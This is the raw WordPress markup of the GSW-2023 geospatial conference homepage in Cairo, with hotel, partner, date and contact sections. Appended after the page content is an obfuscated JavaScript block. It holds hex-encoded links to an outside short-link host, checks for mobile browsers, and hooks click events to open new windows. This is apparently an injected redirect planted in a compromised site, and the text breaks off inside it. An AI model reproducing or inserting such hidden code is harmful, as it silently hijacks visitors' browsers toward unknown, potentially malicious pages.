/></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 